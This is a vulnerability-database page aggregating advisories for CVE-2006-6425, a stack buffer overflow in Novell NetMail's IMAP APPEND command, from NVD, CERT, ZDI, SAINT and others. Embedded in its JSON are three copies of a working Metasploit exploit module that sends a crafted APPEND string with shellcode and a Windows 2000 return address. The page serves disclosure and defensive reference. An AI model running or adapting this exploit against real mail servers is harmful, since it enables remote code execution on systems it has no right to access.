Search...

Novell NetMail IMAP Daemon (IMAPD) APPEND Command Remote Overflow

2006-12-23T04:49:03

ID OSVDB:31362
Type osvdb
Reporter OSVDB
Modified 2006-12-23T04:49:03

Description

No description provided by the source

References:

Vendor Specific News/Changelog Entry: https://secure-support.novell.com/KanisaPlatform/Publishing/134/3096026_f.SAL_Public.html Security Tracker: 1017437 Secunia Advisory ID:23437 Related OSVDB ID: 31363 Related OSVDB ID: 31361 Related OSVDB ID: 31360 Other Advisory URL: http://www.zerodayinitiative.com/advisories/ZDI-06-054.html Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-12/0383.html FrSIRT Advisory: ADV-2006-5134 CVE-2006-6425 Bugtraq ID: 21723

JSON Vulners Source

Initial Source

{"href": "https://vulners.com/osvdb/OSVDB:31362", "id": "OSVDB:31362", "reporter": "OSVDB", "published": "2006-12-23T04:49:03", "description": "# No description provided by the source\n\n## References:\nVendor Specific News/Changelog Entry: https://secure-support.novell.com/KanisaPlatform/Publishing/134/3096026_f.SAL_Public.html\nSecurity Tracker: 1017437\n[Secunia Advisory ID:23437](https://secuniaresearch.flexerasoftware.com/advisories/23437/)\n[Related OSVDB ID: 31363](https://vulners.com/osvdb/OSVDB:31363)\n[Related OSVDB ID: 31361](https://vulners.com/osvdb/OSVDB:31361)\n[Related OSVDB ID: 31360](https://vulners.com/osvdb/OSVDB:31360)\nOther Advisory URL: http://www.zerodayinitiative.com/advisories/ZDI-06-054.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-12/0383.html\nFrSIRT Advisory: ADV-2006-5134\n[CVE-2006-6425](https://vulners.com/cve/CVE-2006-6425)\nBugtraq ID: 21723\n", "title": "Novell NetMail IMAP Daemon (IMAPD) APPEND Command Remote Overflow", "lastseen": "2017-04-28T13:20:27", "bulletinFamily": "software", "type": "osvdb", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "references": [], "edition": 1, "cvelist": ["CVE-2006-6425"], "affectedSoftware": [], "viewCount": 1, "enchantments": {"score": {"value": 8.5, "vector": "NONE", "modified": "2017-04-28T13:20:27", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2006-6425"]}, {"type": "cert", "idList": ["VU:258753"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:15476"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/IMAP/NOVELL_NETMAIL_APPEND"]}, {"type": "saint", "idList": ["SAINT:75D2335325D559707D90A4698C5C85B4", "SAINT:CFFEB3C568AABF3A8E696DC98997CB90", "SAINT:8F1B86241DF23534377AA9E12E1E0ACB"]}, {"type": "zdi", "idList": ["ZDI-06-054"]}, {"type": "exploitdb", "idList": ["EDB-ID:16488"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:83098"]}], "modified": "2017-04-28T13:20:27", "rev": 2}, "vulnersScore": 8.5}, "modified": "2006-12-23T04:49:03"}

{"cve": [{"lastseen": "2020-12-09T19:23:50", "description": "Stack-based buffer overflow in the IMAP daemon (IMAPD) in Novell NetMail before 3.52e FTF2 allows remote authenticated users to execute arbitrary code via unspecified vectors involving the APPEND command.\nSuccessful exploitation requires a valid user account.\r\nThis vulnerability is addressed in the following product update:\r\nNovell, NetMail, 3.52e FTF2", "edition": 5, "cvss3": {}, "published": "2006-12-27T01:28:00", "title": "CVE-2006-6425", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-6425"], "modified": "2018-10-17T21:48:00", "cpe": ["cpe:/a:novell:netmail:3.0.1", "cpe:/a:novell:netmail:3.5", "cpe:/a:novell:netmail:3.10", "cpe:/a:novell:netmail:3.5.2", "cpe:/a:novell:netmail:3.1", "cpe:/a:novell:netmail:3.0.3a"], "id": "CVE-2006-6425", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-6425", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:novell:netmail:3.10:g:*:*:*:*:*:*", "cpe:2.3:a:novell:netmail:3.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:novell:netmail:3.10:e:*:*:*:*:*:*", "cpe:2.3:a:novell:netmail:3.1:f:*:*:*:*:*:*", "cpe:2.3:a:novell:netmail:3.5:*:*:*:*:*:*:*", "cpe:2.3:a:novell:netmail:3.5.2:e-ftfl:*:*:*:*:*:*", "cpe:2.3:a:novell:netmail:3.10:c:*:*:*:*:*:*", "cpe:2.3:a:novell:netmail:3.1:*:*:*:*:*:*:*", "cpe:2.3:a:novell:netmail:3.10:f:*:*:*:*:*:*", "cpe:2.3:a:novell:netmail:3.10:a:*:*:*:*:*:*", "cpe:2.3:a:novell:netmail:3.10:*:*:*:*:*:*:*", "cpe:2.3:a:novell:netmail:3.10:d:*:*:*:*:*:*", "cpe:2.3:a:novell:netmail:3.0.3a:a:*:*:*:*:*:*", "cpe:2.3:a:novell:netmail:3.10:h:*:*:*:*:*:*", "cpe:2.3:a:novell:netmail:3.0.3a:b:*:*:*:*:*:*", "cpe:2.3:a:novell:netmail:3.10:b:*:*:*:*:*:*"]}], "saint": [{"lastseen": "2019-05-29T17:19:56", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-6425"], "edition": 2, "description": "Added: 12/29/2006 \nCVE: [CVE-2006-6425](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6425>) \nBID: [21723](<http://www.securityfocus.com/bid/21723>) \nOSVDB: [31362](<http://www.osvdb.org/31362>) \n\n\n### Background\n\n[Novell NetMail](<http://www.novell.com/products/netmail/>) is an e-mail and calendaring server application. \n\n### Problem\n\nA buffer overflow in the NetMail IMAP service allows remote, authenticated attackers to execute arbitrary commands by sending a long, specially crafted APPEND command. \n\n### Resolution\n\nApply NetMail 3.5.2e FTF2 for [Linux](<http://support.novell.com/servlet/downloadfile?file=/sec/pub/nm352e_ftf2_lx.tgz>), [Netware](<http://support.novell.com/servlet/downloadfile?file=/sec/pub/nm352e_ftf2_nw.zip>), or [Windows](<http://support.novell.com/servlet/downloadfile?file=/sec/pub/nm352e_ftf2_win.zip>). \n\n### References\n\n[http://www.novell.com/support/search.do?cmd=displayKC&externalId=3096026&sliceId=SAL_Public ](<http://www.novell.com/support/search.do?cmd=displayKC&externalId=3096026&sliceId=SAL_Public\n>) \n<http://www.zerodayinitiative.com/advisories/ZDI-06-054.html> \n\n\n### Limitations\n\nExploit works on NetMail 3.5.2 and requires the login and password of a valid IMAP account. \n\n### Platforms\n\nWindows 2000 \nWindows XP \n \n\n", "modified": "2006-12-29T00:00:00", "published": "2006-12-29T00:00:00", "id": "SAINT:75D2335325D559707D90A4698C5C85B4", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/netmail_imap_append", "type": "saint", "title": "NetMail IMAP APPEND command buffer overflow", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2019-06-04T23:19:36", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-6425"], "description": "Added: 12/29/2006 \nCVE: [CVE-2006-6425](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6425>) \nBID: [21723](<http://www.securityfocus.com/bid/21723>) \nOSVDB: [31362](<http://www.osvdb.org/31362>) \n\n\n### Background\n\n[Novell NetMail](<http://www.novell.com/products/netmail/>) is an e-mail and calendaring server application. \n\n### Problem\n\nA buffer overflow in the NetMail IMAP service allows remote, authenticated attackers to execute arbitrary commands by sending a long, specially crafted APPEND command. \n\n### Resolution\n\nApply NetMail 3.5.2e FTF2 for [Linux](<http://support.novell.com/servlet/downloadfile?file=/sec/pub/nm352e_ftf2_lx.tgz>), [Netware](<http://support.novell.com/servlet/downloadfile?file=/sec/pub/nm352e_ftf2_nw.zip>), or [Windows](<http://support.novell.com/servlet/downloadfile?file=/sec/pub/nm352e_ftf2_win.zip>). \n\n### References\n\n[http://www.novell.com/support/search.do?cmd=displayKC&externalId=3096026&sliceId=SAL_Public ](<http://www.novell.com/support/search.do?cmd=displayKC&externalId=3096026&sliceId=SAL_Public\n>) \n<http://www.zerodayinitiative.com/advisories/ZDI-06-054.html> \n\n\n### Limitations\n\nExploit works on NetMail 3.5.2 and requires the login and password of a valid IMAP account. \n\n### Platforms\n\nWindows 2000 \nWindows XP \n \n\n", "edition": 4, "modified": "2006-12-29T00:00:00", "published": "2006-12-29T00:00:00", "id": "SAINT:CFFEB3C568AABF3A8E696DC98997CB90", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/netmail_imap_append", "title": "NetMail IMAP APPEND command buffer overflow", "type": "saint", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2016-10-03T15:01:54", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-6425"], "description": "Added: 12/29/2006 \nCVE: [CVE-2006-6425](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6425>) \nBID: [21723](<http://www.securityfocus.com/bid/21723>) \nOSVDB: [31362](<http://www.osvdb.org/31362>) \n\n\n### Background\n\n[Novell NetMail](<http://www.novell.com/products/netmail/>) is an e-mail and calendaring server application. \n\n### Problem\n\nA buffer overflow in the NetMail IMAP service allows remote, authenticated attackers to execute arbitrary commands by sending a long, specially crafted APPEND command. \n\n### Resolution\n\nApply NetMail 3.5.2e FTF2 for [Linux](<http://support.novell.com/servlet/downloadfile?file=/sec/pub/nm352e_ftf2_lx.tgz>), [Netware](<http://support.novell.com/servlet/downloadfile?file=/sec/pub/nm352e_ftf2_nw.zip>), or [Windows](<http://support.novell.com/servlet/downloadfile?file=/sec/pub/nm352e_ftf2_win.zip>). \n\n### References\n\n[http://www.novell.com/support/search.do?cmd=displayKC&externalId=3096026&sliceId=SAL_Public ](<http://www.novell.com/support/search.do?cmd=displayKC&externalId=3096026&sliceId=SAL_Public\n>) \n<http://www.zerodayinitiative.com/advisories/ZDI-06-054.html> \n\n\n### Limitations\n\nExploit works on NetMail 3.5.2 and requires the login and password of a valid IMAP account. \n\n### Platforms\n\nWindows 2000 \nWindows XP \n \n\n", "edition": 1, "modified": "2006-12-29T00:00:00", "published": "2006-12-29T00:00:00", "id": "SAINT:8F1B86241DF23534377AA9E12E1E0ACB", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/netmail_imap_append", "type": "saint", "title": "NetMail IMAP APPEND command buffer overflow", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "cert": [{"lastseen": "2020-09-18T20:42:54", "bulletinFamily": "info", "cvelist": ["CVE-2006-6425"], "description": "### Overview \n\nA vulnerability in the way Novell NetMail handles IMAP \"APPEND\" commands may cause a buffer overflow that may allow remote execution of arbitrary code.\n\n### Description \n\nNovell NetMail's IMAP server contains a buffer overflow that may occur when processing parameters supplied to the \"APPEND\" command. An attacker must login to an affected system in order to take advantage of this vulnerability. \n \n--- \n \n### Impact \n\nA remote, authenticated attacker may be able to execute arbitrary code or cause a denial-of-service condition. \n \n--- \n \n### Solution \n\n**Update**\n\nNovell has released an update to address this issue. See Novell document [3096026](<http://www.novell.com/support/search.do?cmd=displayKC&externalId=3096026&sliceId=SAL_Public>) for more details. \n \n--- \n \n### Vendor Information\n\n258753\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. Click here to view vendors.**\n\n### Novell, Inc. __ Affected\n\nUpdated: January 15, 2007 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nRefer to Novell document [3096026](<http://www.novell.com/support/search.do?cmd=displayKC&externalId=3096026&sliceId=SAL_Public>).\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23258753 Feedback>).\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | | \nTemporal | | \nEnvironmental | | \n \n \n\n\n### References \n\n * [http://www.novell.com/support/search.do?cmd=displayKC&externalId=3096026&sliceId=SAL_Public](<http://www.novell.com/support/search.do?cmd=displayKC&externalId=3096026&sliceId=SAL_Public>)\n * <http://secunia.com/advisories/23437/>\n * <http://www.zerodayinitiative.com/advisories/ZDI-06-054.html>\n * <http://www.securityfocus.com/bid/21729>\n\n### Acknowledgements\n\nThis issue is addressed in Novell document 3096026. Novell credits an anonymous researcher working with TippingPoint and the Zero Day Initiative for reporting this issue.\n\nThis document was written by Chris Taschner.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2006-6425](<http://web.nvd.nist.gov/vuln/detail/CVE-2006-6425>) \n---|--- \n**Severity Metric:** | 5.49 \n**Date Public:** | 2006-12-23 \n**Date First Published:** | 2007-01-17 \n**Date Last Updated: ** | 2007-01-30 21:52 UTC \n**Document Revision: ** | 14 \n", "modified": "2007-01-30T21:52:00", "published": "2007-01-17T00:00:00", "id": "VU:258753", "href": "https://www.kb.cert.org/vuls/id/258753", "type": "cert", "title": "Novell NetMail IMAP server vulnerable to buffer overflow when processing \"APPEND\" commands", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2016-02-01T23:58:45", "description": "Novell NetMail. CVE-2006-6425. Remote exploit for windows platform", "published": "2010-05-09T00:00:00", "type": "exploitdb", "title": "Novell NetMail <= 3.52d IMAP APPEND Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-6425"], "modified": "2010-05-09T00:00:00", "id": "EDB-ID:16488", "href": "https://www.exploit-db.com/exploits/16488/", "sourceData": "##\r\n# $Id: novell_netmail_append.rb 9262 2010-05-09 17:45:00Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = AverageRanking\r\n\r\n\tinclude Msf::Exploit::Remote::Imap\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'Novell NetMail <= 3.52d IMAP APPEND Buffer Overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a stack buffer overflow in Novell's Netmail 3.52 IMAP APPEND\r\n\t\t\t\tverb. By sending an overly long string, an attacker can overwrite the\r\n\t\t\t\tbuffer and control program execution.\r\n\t\t\t},\r\n\t\t\t'Author' => [ 'MC' ],\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Version' => '$Revision: 9262 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2006-6425' ],\r\n\t\t\t\t\t[ 'OSVDB', '31362' ],\r\n\t\t\t\t\t[ 'BID', '21723' ],\r\n\t\t\t\t\t[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-06-054.html' ],\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => true,\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'thread',\r\n\t\t\t\t},\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 700,\r\n\t\t\t\t\t'BadChars' => \"\\x00\\x0a\\x0d\\x20\",\r\n\t\t\t\t\t'StackAdjustment' => -3500,\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t['Windows 2000 SP0-SP4 English', { 'Ret' => 0x75022ac4 }],\r\n\t\t\t\t],\r\n\t\t\t'DefaultTarget' => 0,\r\n\t\t\t'DisclosureDate' => 'Dec 23 2006'))\r\n\r\n\tend\r\n\r\n\tdef exploit\r\n\t\tsploit = \"a002 APPEND \" + \"saved-messages (\\Seen) \"\r\n\t\tsploit << rand_text_english(1358) + payload.encoded + \"\\xeb\\x06\"\r\n\t\tsploit << rand_text_english(2) + [target.ret].pack('V')\r\n\t\tsploit << [0xe9, -585].pack('CV') + rand_text_english(150)\r\n\r\n\t\tinfo = connect_login\r\n\r\n\t\tif (info == true)\r\n\t\t\tprint_status(\"Trying target #{target.name}...\")\r\n\t\t\tsock.put(sploit + \"\\r\\n\")\r\n\t\telse\r\n\t\t\tprint_status(\"Not falling through with exploit\")\r\n\t\tend\r\n\r\n\t\thandler\r\n\t\tdisconnect\r\n\tend\r\nend\r\n", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/16488/"}], "zdi": [{"lastseen": "2020-06-22T11:39:59", "bulletinFamily": "info", "cvelist": ["CVE-2006-6425"], "edition": 3, "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Novell NetMail. Successful exploitation requires the attacker to successfully authenticate to the affected service. The specific flaw exists in the NetMail IMAP server's handling of the APPEND command. A lack of bounds checking on a specific parameter to this command can lead to a stack-based buffer overflow. This vulnerability can be exploited to execute arbitrary code.", "modified": "2006-06-22T00:00:00", "published": "2006-12-22T00:00:00", "href": "https://www.zerodayinitiative.com/advisories/ZDI-06-054/", "id": "ZDI-06-054", "title": "Novell NetMail IMAP APPEND Buffer Overflow Vulnerability", "type": "zdi", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "metasploit": [{"lastseen": "2020-07-02T22:35:49", "description": "This module exploits a stack buffer overflow in Novell's Netmail 3.52 IMAP APPEND verb. By sending an overly long string, an attacker can overwrite the buffer and control program execution.\n", "published": "2007-01-01T14:12:22", "type": "metasploit", "title": "Novell NetMail IMAP APPEND Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-6425"], "modified": "2017-07-24T13:26:21", "id": "MSF:EXPLOIT/WINDOWS/IMAP/NOVELL_NETMAIL_APPEND", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = AverageRanking\n\n include Msf::Exploit::Remote::Imap\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Novell NetMail IMAP APPEND Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in Novell's Netmail 3.52 IMAP APPEND\n verb. By sending an overly long string, an attacker can overwrite the\n buffer and control program execution.\n },\n 'Author' => [ 'MC' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2006-6425' ],\n [ 'OSVDB', '31362' ],\n [ 'BID', '21723' ],\n [ 'ZDI', '06-054' ],\n ],\n 'Privileged' => true,\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'thread',\n },\n 'Payload' =>\n {\n 'Space' => 700,\n 'BadChars' => \"\\x00\\x0a\\x0d\\x20\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n ['Windows 2000 SP0-SP4 English', { 'Ret' => 0x75022ac4 }],\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Dec 23 2006'))\n\n end\n\n def exploit\n sploit = \"a002 APPEND \" + \"saved-messages (\\Seen) \"\n sploit << rand_text_english(1358) + payload.encoded + \"\\xeb\\x06\"\n sploit << rand_text_english(2) + [target.ret].pack('V')\n sploit << [0xe9, -585].pack('CV') + rand_text_english(150)\n\n info = connect_login\n\n if (info == true)\n print_status(\"Trying target #{target.name}...\")\n sock.put(sploit + \"\\r\\n\")\n else\n print_status(\"Not falling through with exploit\")\n end\n\n handler\n disconnect\n end\nend\n", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/imap/novell_netmail_append.rb"}], "securityvulns": [{"lastseen": "2018-08-31T11:10:20", "bulletinFamily": "software", "cvelist": ["CVE-2006-6425"], "description": "ZDI-06-054: Novell NetMail IMAP APPEND Buffer Overflow Vulnerability\r\nhttp://www.zerodayinitiative.com/advisories/ZDI-06-054.html\r\nDecember 22, 2006\r\n\r\n-- CVE ID:\r\nCVE-2006-6425\r\n\r\n-- Affected Vendor:\r\nNovell\r\n\r\n-- Affected Products:\r\nNovell NetMail 3.5.2\r\n\r\n-- TippingPoint(TM) IPS Customer Protection:\r\nTippingPoint IPS customers have been protected against this\r\nvulnerability since December 21, 2006 by Digital Vaccine protection\r\nfilter ID 3868. For further product information on the TippingPoint IPS:\r\n\r\n http://www.tippingpoint.com \r\n\r\n-- Vulnerability Details:\r\nThis vulnerability allows remote attackers to execute arbitrary code on\r\naffected installations of Novell NetMail. Successful exploitation\r\nrequires the attacker to successfully authenticate to the affected\r\nservice.\r\n\r\nThe specific flaw exists in the NetMail IMAP server's handling of the\r\nAPPEND command. A lack of bounds checking on a specific parameter to\r\nthis command can lead to a stack-based buffer overflow. This\r\nvulnerability can be exploited to execute arbitrary code.\r\n\r\n-- Vendor Response:\r\nNovell has issued an update to correct this vulnerability. More details\r\ncan be found at:\r\n\r\n \r\nhttp://www.novell.com/support/search.do?cmd=displayKC&externalId=3096026&sliceId=SAL_Public\r\n\r\n-- Disclosure Timeline:\r\n2006.08.14 - Vulnerability reported to vendor\r\n2006.12.21 - Digital Vaccine released to TippingPoint customers\r\n2006.12.22 - Coordinated public release of advisory\r\n\r\n-- Credit:\r\nThis vulnerability was discovered by an anonymous researcher.\r\n\r\n-- About the Zero Day Initiative (ZDI):\r\nEstablished by TippingPoint, a division of 3Com, The Zero Day Initiative\r\n(ZDI) represents a best-of-breed model for rewarding security\r\nresearchers for responsibly disclosing discovered vulnerabilities.\r\n\r\nResearchers interested in getting paid for their security research\r\nthrough the ZDI can find more information and sign-up at:\r\n\r\n http://www.zerodayinitiative.com\r\n\r\nThe ZDI is unique in how the acquired vulnerability information is used.\r\n3Com does not re-sell the vulnerability details or any exploit code.\r\nInstead, upon notifying the affected product vendor, 3Com provides its\r\ncustomers with zero day protection through its intrusion prevention\r\ntechnology. Explicit details regarding the specifics of the\r\nvulnerability are not exposed to any parties until an official vendor\r\npatch is publicly available. Furthermore, with the altruistic aim of\r\nhelping to secure a broader user base, 3Com provides this vulnerability\r\ninformation confidentially to security vendors (including competitors)\r\nwho have a vulnerability protection or mitigation product.\r\n\r\n_______________________________________________\r\nFull-Disclosure - We believe in it.\r\nCharter: http://lists.grok.org.uk/full-disclosure-charter.html\r\nHosted and sponsored by Secunia - http://secunia.com/", "edition": 1, "modified": "2006-12-23T00:00:00", "published": "2006-12-23T00:00:00", "id": "SECURITYVULNS:DOC:15476", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:15476", "title": "[Full-disclosure] ZDI-06-054: Novell NetMail IMAP APPEND Buffer Overflow Vulnerability", "type": "securityvulns", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:11:45", "description": "", "published": "2009-11-26T00:00:00", "type": "packetstorm", "title": "Novell NetMail <= 3.52d IMAP APPEND Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-6425"], "modified": "2009-11-26T00:00:00", "id": "PACKETSTORM:83098", "href": "https://packetstormsecurity.com/files/83098/Novell-NetMail-3.52d-IMAP-APPEND-Buffer-Overflow.html", "sourceData": "`## \n# $Id$ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \n \nrequire 'msf/core' \n \n \nclass Metasploit3 < Msf::Exploit::Remote \n \ninclude Msf::Exploit::Remote::Imap \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Novell NetMail <= 3.52d IMAP APPEND Buffer Overflow', \n'Description' => %q{ \nThis module exploits a stack overflow in Novell's Netmail 3.52 IMAP APPEND \nverb. By sending an overly long string, an attacker can overwrite the \nbuffer and control program execution. \n}, \n'Author' => [ 'MC' ], \n'License' => MSF_LICENSE, \n'Version' => '$Revision$', \n'References' => \n[ \n[ 'CVE', '2006-6425' ], \n[ 'OSVDB', '31362' ], \n[ 'BID', '21723' ], \n[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-06-054.html' ], \n], \n'Privileged' => true, \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'thread', \n}, \n'Payload' => \n{ \n'Space' => 700, \n'BadChars' => \"\\x00\\x0a\\x0d\\x20\", \n'StackAdjustment' => -3500, \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n['Windows 2000 SP0-SP4 English', { 'Ret' => 0x75022ac4 }], \n], \n'DefaultTarget' => 0, \n'DisclosureDate' => 'Dec 23 2006')) \n \nend \n \ndef exploit \nsploit = \"a002 APPEND \" + \"saved-messages (\\Seen) \" \nsploit << rand_text_english(1358) + payload.encoded + \"\\xeb\\x06\" \nsploit << rand_text_english(2) + [target.ret].pack('V') \nsploit << [0xe9, -585].pack('CV') + rand_text_english(150) \n \ninfo = connect_login \n \nif (info == true) \nprint_status(\"Trying target #{target.name}...\") \nsock.put(sploit + \"\\r\\n\") \nelse \nprint_status(\"Not falling through with exploit\") \nend \n \nhandler \ndisconnect \nend \nend \n`\n", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/83098/novell_netmail_append.rb.txt"}]}